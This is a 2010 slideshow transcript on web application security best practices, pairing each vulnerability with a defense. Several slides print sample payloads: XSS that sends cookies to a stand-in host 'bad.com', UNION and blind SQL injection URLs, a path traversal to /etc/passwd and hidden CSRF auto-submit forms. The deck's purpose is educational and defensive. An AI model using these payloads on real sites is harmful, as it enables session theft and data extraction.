Best practices of web app security (samvel gevorgyan)

1. BEST PRACTICES OF2010WEB APPLICATION SECURITYby SamvelGevorgyan

2. STATISTICS OF VULNERABILITIESSource: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html

3. STATISTICS OF RISK LEVELSSource: ptresearch.blogspot.com/2010/06/web-application-vulnerability.html

4. TOP 10 HIGH LEVEL VULNERABILITIES01. Cross-Site Scripting (XSS) [Symantec - 2007]02. Information leakage03. SQL Injection [~2005]04. Cross-Site Request Forgery (CSRF) [1990s]05. ClickJacking [J.Grossman and R.Hansen - 2008]06. Phishing[1987, 1996]07. Path Traversal or Local/Remote File Inclusion08. Shell injection09. Session Hijacking [early 2000s]10. File uploads

5. CROSS-SITE SCRIPTINGDESCRIPTION: Cross-Site Scripting is a type of web application vulnerability when the attacker injects his executable code into the vulnerable website.EXAMPLE:http://site.com/search.php?q=<script>alert(“XSS”)</script>

6. CROSS-SITE SCRIPTINGTYPES:Non-PersistantPersistant1.Non-Persistant:In this type of XSS vulnerability the attacker is able to execute his own code in a website but no changes can be done in that website.

7. CROSS-SITE SCRIPTINGNon-PersistantEXAMPLE:http://www.site.com/viewtopic.php?id=4"><script>document.location="http://bad.com/logger.php?cookie="+document.cookie;</script>OR http://www.site.com/viewtopic.php?id=4”><script>document.write(“<img src=‘http://bad.com/logger.php?cookie=“+ document.cookie+”’/>”);</script>

8. CROSS-SITE SCRIPTING2.Persistant:In this case attacker stores his executable script in the vulnerable website database which is being executed every time webpage is showing that data.Common targets are:Comments

9. Chat messages

10. E-mail messages

11. Wall posts, etc.CROSS-SITE SCRIPTINGPersistantEXAMPLE:

12. CROSS-SITE SCRIPTINGPersistantComment in raw format:and I like the way this website developerswork..hahaha :D :D<SCRIPT/XSS SRC="http://bad.com/xss.js"></SCRIPT>

13. CROSS-SITE SCRIPTINGPotentially Dangerous HTML elemets:TAGS<applet>

14. <body>

15. <embed>

16. <frame>

17. <script>

18. <frameset>

19. <html>

20. <iframe>

21. <img>

22. <style>

23. <layer>

24. <ilayer>

25. <meta>

26. <object> ATTRIBUTESsrc

27. style

28. href

29. lowsrcCROSS-SITE SCRIPTINGPotentially Dangerous HTML events:Onblur

30. Onchange

31. Onclick

32. Ondrag

33. Onerror

34. Onfocus

35. Onkeypress

36. Onkeyup

37. Onload

38. Onmouseover

39. Onmousemove

40. Onmove

41. Onresize

42. Onselectstart

43. Onselect

44. Onsubmit

45. Onunload

46. Onscroll, etc.*all HTML events

47. CROSS-SITE SCRIPTINGSOLUTIONS:PHP function strip_tags()

48. PHP Input Filter

49. PHP libraries:

50. HTML_Safe

51. htmLawed

52. kses

53. Safe HTML Checker, etc.BEST SOLUTIONOWASP HTML Purifier:SAFE HTML Purifier defeats XSS with an audited whitelistCLEANHTML Purifier ensures standards-compliant outputOPEN HTML Purifier is open-source and highly customizable

54. BEST SOLUTIONCOMPARISON:Source: www.htmlpurifier.org/comparison

55. BEST SOLUTIONCOMPARISON:Source: www.htmlpurifier.org/comparison

56. INFORMATION LEAKAGEDESCRIPTION: Information Leakage is an application weakness where an application reveals sensitive data, such as technical details of the web application, environment, or user-specific data.EXAMPLE: Warning: include(pages/../../../../../../etc/passwd1) [function.include]: failed to open stream: No such file or directory in /usr/www/users/kint/view.php on line 20

57. INFORMATION LEAKAGECOUSES OF:Directory listening misconfigurationUnproper error handlingUnproper filetype handlingSensitive HTML comments, etc.1.Directory listening misconfiguration:Leaving directory listening enabled allows the attacker to read the list of all files in a directory.

58. INFORMATION LEAKAGEDirectory listening misconfigurationEXAMPLE:Index of /admin

59. INFORMATION LEAKAGE2.Unproper error handling:Because of unproper error handling all the unexpecting requests will generate error messages which will be visible to the attacker.EXAMPLE: Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/aes/public_html/news/list.php on line 81

60. INFORMATION LEAKAGE3.Unproper filetype handling: Unproper filetype handling allows your important files to be readable by the attacker.EXAMPLE:

61. sql_backup.tar.gz

62. memberlist.xml

63. phpinfo.html

64. dbClass.inc

65. Login.php.bkpINFORMATION LEAKAGEUnproper filetype handlingEXAMPLE: dbClass.inc… private $host = "localhost"; private $usr = “root“; private $pwd = “i7kT0w“; public $db = "brav_new"; public function Connect(){ … }…

66. INFORMATION LEAKAGE4.Sensitive HTML comments: Notes left by webdevelopers may content important information which will cause of the information leakage. EXAMPLE:<form enctype="multipart/form-data" action="upload.php" method="POST">  <input name="upload_file" type="file" /> …

67. BEST SOLUTIONDirectory listening misconfigurationput a blank file named index.html in that directory.put a file named .htaccess in that directory consisting of only this line:Options –indexes NOTE: all sub-directories of that directory will also get their directory listings turned off.

68. BEST SOLUTIONUnproper error handlingThe following configurations should be done in php.ini file:error_reporting = E_ALL

69. display_errors = Off

70. log_errors = On

71. error_log = path/PHP_errors.log //any file in which the web server has write privileges.BEST SOLUTIONUnproper error handlingCreate an .htaccess file in public_html directory with the following lines: php_flag display_errors off php_flag log_errors on php_value error_log path/PHP_errors.log <Files path/PHP_errors.log> Order allow,deny Deny from all Satisfy All </Files

72. BEST SOLUTIONUnproper filetype handlingDon’t keep your important files with the following extentions in your public web directory if you don’t link to them in the website:Compressed files(*.zip, *.rar, *.tar.gz, etc.)

73. Database files(*.sql, *.cvs, *.xml, *.xls, etc.)

74. Unknown files(*.inc, *.copy, *.bkp, etc.)BEST SOLUTIONSensitive HTML commentsNo sensetive HTML comment must be used in a website as every user will be able to view the webpage source code.

75. SQL INJECTIONDESCRIPTION: This is a type of vulnerability when attacker injects his custom SQL query to the request to get sensetive data from the database, read or write a file.EXAMPLE:http://site.com/product.php?id=4+AND+1=2+UNION+SELECT+0,database(),1,2+--

76. SQL INJECTIONTYPES:NormalBlind1.Normal:In this type of SQL Injection vulnerability attacker sends a custom SQL query and gets the output in the screen.

77. SQL INJECTIONNormal SQL InjectionEXAMPLE: http://site.com/product.php?id=1348+AND+1=2+union+select+1,2,user(),database(), 5,version(),7+--

78. SQL INJECTION2.Blind:This type of injection is identical to normal SQL Injection except that the SQL query returns positive or negative response.EXAMPLE: http://site.com/view.php?page=10+ and+substring(@@version,1,1)=5+--

79. SQL INJECTIONSOLUTIONS:PHP.ini configuration

80. magic_quotes_gpc = on

81. PHP functions

82. filter_var()

83. mysql_real_escape_string()

84. sprintf()

85. Put variables into the quotes(e.g: ‘$id’)

86. Assign min privilages for mysql usersBEST SOLUTIONGreenSQL open source database firewall:Activity monitoring and auditUser rights managementReal-time database protectionIntrusion preventation(IPS)Database cachingEncrypted comunication over SSLVirtual patchingReporting

87. BEST SOLUTIONGreenSQL open source database firewall:

88. CROSS-SITE REQUEST FORGERYDESCRIPTION: This vulnerability of web application allows attacker’s website to manipulate its actions using authorized user’s session.EXAMPLE: <img src=“http://site.com/share.php?url=http://bad.com” style=“display:none” />

89. CROSS-SITE REQUEST FORGERYEXAMPLE:<div style=“display:none”> <iframe name=“hidden”></iframe> <form name=“Form” action= “http://site.com/post.php” target=“hidden” method=“POST”> <input type=“text” name=“message” value=“I like www.bad.com” /> <input type=“submit” /> </form> <script>document.Form.submit();</script> </div>

90. CROSS-SITE REQUEST FORGERYUSELESS DEFANCES:Only accept POSTStops simple link-based attacks (IMG, frames, etc.)But hidden POST requests can be created with frames, scripts, etc. Referer checkingSome users prohibit referers, so you can’t just require referer headersTechniques to selectively create HTTP request without referers existRequiring multi-step transactionsCSRF attack can perform each step in order

91. CROSS-SITE REQUEST FORGERYSOLUTIONS: CAPTHCAsThis is a type of challenge-response test used in computing to ensure that the response is not generated by a computer. One-time tokensUnlike the CAPTCHA’s system this is a unique number stored in the form field and in session to compare them after submiting the form.

92. BEST SOLUTIONBusiness ProcessingAdd Tokento HTMLOWASPCSRFGuardVerify TokenOWASP CSRFGuardAdds token to:

93. href attribute

94. src attribute

95. hidden field in all forms

96. Actions:

97. Log

98. Invalidate

99. RedirectUser(Browser)1. Add token with regex2. Add token with HTML parser3. Add token in browser with JavascriptSource: www.owasp.org/index.php/CSRFGuard

100. CLICK-JACKINGDESCRIPTION: This is the advanced version of Cross-Site Request Forgery. It uses all the flexibility of front-end languages to bypass protected forms and send a request using victim’s active session.EXAMPLE: <div style="position:fixed; width:100%; height:100%; z-index:999;" onclick="alert(‘ClickJacked');"></div>

101. CLICK-JACKINGEXAMPLE:

102. BEST SOLUTIONFrameKiller(frame busting):<style> html{ display : none; }</style> <script>if( self == top ) { document.documentElement.style.display = 'block' ; } else { top.location = self.location; }</script>OWASP CSRFGuard

Best practices of web app security (samvel gevorgyan)

Related slideshows

More Related Content

Best practices of web app security (samvel gevorgyan)

Editor's Notes